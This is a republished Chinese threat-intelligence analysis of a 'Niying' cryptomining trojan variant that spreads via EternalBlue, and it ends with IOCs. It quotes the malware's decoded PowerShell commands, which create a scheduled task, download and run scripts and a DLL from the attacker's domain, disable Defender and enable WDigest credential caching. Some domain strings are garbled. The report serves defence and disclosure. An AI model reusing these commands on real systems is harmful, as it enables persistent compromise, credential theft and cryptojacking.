感谢腾讯御见威胁情报中心来稿！

原文链接：https://mp.weixin.qq.com/s/WoYcqgC-xXtM2s752215yQ

一、背景

腾讯安全威胁情报中心检测到“匿影”挖矿木马变种攻击。该变种木马依然利用永恒之蓝漏洞进行攻击传播，通过计划任务、WMI后门进行本地持久化，然后在攻陷机器下载XMRig矿机挖矿门罗币、下载nbminer矿机挖矿HNS（Handshake），还会利用regsvr32.exe加载执行DLL形式的木马程序，匿影木马新变种在已安装腾讯电脑管家等数款安全软件的电脑上不运行，试图避免被安全厂商检测到。

“匿影”挖矿木马擅长利用利用各类公共网址进行数据统计和木马下载，此次变种攻陷了某旅游文化网站并将其作为木马下载服务器，其使用过的公共网址如下：

upload.ee 免费网盘
anonfiles.com 免费图床
sowcar.com 免费图床
popo8.com 免费图床
img.vim-cn.com 免费图床
urlxxx.at.ua 建站服务
mywebnew.ucoz.pl 建站服务
addressnet.do.am 建站服务
googlenew.moy.su 建站服务
ludengapp.com 某设计公司网站
worldyou.top 某文旅公司网站（新）

二、样本分析

“匿影”挖矿木马释放永恒之蓝漏洞利用攻击程序包到C:\Users\Public目录下并启动主程序storageg.exe开始扫描攻击。

在攻陷的目标机器执行Payload（x86.dll或x64.dll）, Payload会检测腾讯电脑管家、金山毒霸等杀软是否存在，若不存在继续执行一段Base64编码的Powershell命令。

Base64编码的Powershell命令解码后内容如下：

schtasks /create /ru system /sc MINUTE /mo 80 /tn VNware /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBtAHkAdwBlAGIAcwBhAGEAdAAuAHgAeQB6AC8AdgBpAHAALgB0AHgAdAAnACkAKQA="

该命令安装名为“VNware ”的计划任务，每隔80分钟执行一次另一段经过base64编码的Powershell命令，同样，解码后内容如下：

IEX ((new-object net.webclient).downloadstring('http[:]//mywebsaat.xyz/vip.txt'))

然后计划任务从http[:]//mywebsaat.xyz/vip. *** vip.txt反复运行，并完成以下功能：

1、访问统计页面，记录攻击次数

2、安装计划任务“PCHunterDNS”和”\Microsoft\Windows\UPnP\Services”进而持久化执行恶意代码：

IEX ((new-object net.webclient).downloadstring('https[:]//mywebsaat.xyz/123.jpg'))

3、通过注册表修改操作，关闭Windows Defender，同时开启WDigest缓存（可以从内存缓存中窃密用户名和登陆密码）。

在执行该步骤前，脚本会从百度官网下载LOGO图标https[:]//www.baidu.com/img/bd_logo1.png，并保存为C:\ProgramData\Defender.txt，通过判断该文件是否存在，来确认这个步骤是否执行过。

4、安装WMI后门（事件过滤器“ *** amm3”、事件消费者“ *** amm4”）持久化运行恶意代码IEX ((new-object net.webclient).downloadstring(‘http[:]//mywebsaat.xyz/kp.txt’))，而“ *** amm3”、“ *** amm4”是Mykings挖矿僵尸 *** 团伙使用的WMI后门名称，推测“匿影”挖矿木马团伙与Mykings挖矿僵尸 *** 可能有一定的关联。

5、下载和启动挖矿程序，脚本会从多个地址下载不同的挖矿程序，存放在不同的路径下，具体样本如下：

C:\Users\Public\MicrosftEdgeCP.exe是显卡挖矿软件NBMiner
（https://github.com/NebuTech/NBMiner/releases），支持NVIDIA、AMD显卡，支持GRIN、AE、CKB、SERO、SIPC、 *** M、ETH、SWAP等币种的挖矿。

其中某旅游文化公司网站也被黑客攻陷作为挖矿木马下载服务器：

WMI后门中的Powershell脚本kp.txt还会下载DLL木马https[:]//rss.mywebsaat.xyz/cccdll.jpg并利用regsvr32.exe加载执行，然后通过该DLL启动挖矿木马。

new-object System.Net.WebClient).DownloadFile( 'https[:]//rss.mywebsaat.xyz/cccdll.jpg','C:\Users\Public\eos.dll')
`Start-Process -FilePath C:\Windows\SysWOW64\regsvr32.exe '/s C:\Users\Public\eos.dll'`

完成挖矿木马启动和持久化过程后，继续下载永恒之蓝攻击模块http[:]//rss.mywebsaat.xyz/yh.jpg，启动下一轮攻击：

IOCs

Domain
mywebsaat.xyz
rss.mywebsaat.xyz

URL
https[:]//www.upload.ee/files/11799957/1.txt.html
https[:]//www.upload.ee/files/11814903/1.txt.html
https[:]//www.upload.ee/files/11815494/1.txt.html
https[:]//www.upload.ee/files/11816420/1.txt.html
https[:]//www.upload.ee/files/11816445/1.txt.html
https[:]//www.upload.ee/files/11822214/1.txt.html
http[:]//mywebsaat.xyz/999.jpg
https[:]//mywebsaat.xyz/xmr.jpg
http[:]//mywebsaat.xyz/nb.jpg
http[:]//mywebsaat.xyz/yh.jpg
http[:]//mywebsaat.xyzc.jpg
http[:]//mywebsaat.xyz/fxtxt.jpg
http[:]//mywebsaat.xyzakhost.jpg
http[:]//rss.mywebsaat.xyz/xmr.jpg
http[:]//rss.mywebsaat.xyzakhost.jpg
http[:]//rss.mywebsaat.xyz/nb.jpg
http[:]//rss.mywebsaat.xyz/yh.jpg
http[:]//rss.mywebsaat.xyzc.jpg
http[:]//rss.mywebsaat.xyz/fxtxt.jpg
https[:]//mywebsaat.xyz/cccdll.jpg
http[:]//mywebsaat.xyz/kp.txt
https[:]//mywebsaat.xyz/123.jpg
http[:]//www.worldyou.top/images/xmr.jpg
http[:]//www.worldyou.top/images/tsakhost.jpg
http[:]//www.worldyou.top/images/999.jpg
http[:]//www.worldyou.top/images/btc.jpg
http[:]//www.worldyou.top/images/fxtxt.jpg
http[:]//www.worldyou.top/images/nb.jpg
http[:]//www.worldyou.top/images/sd.jpg
http[:]//www.worldyou.top/images/yh.jpg

MD5
33110e53078ed5a0cf440d182878f30b
441a61cdd30502b3fcca03c28ccb49e8
5e20062b94f38e447be60f9f2b0286cd
ee5d5f0e0fe7db7186f72d3d5256b1be
f4fbfb10c441974ef5b892a35b08e6eb
85f25f9264664111f7df6dc76320b90b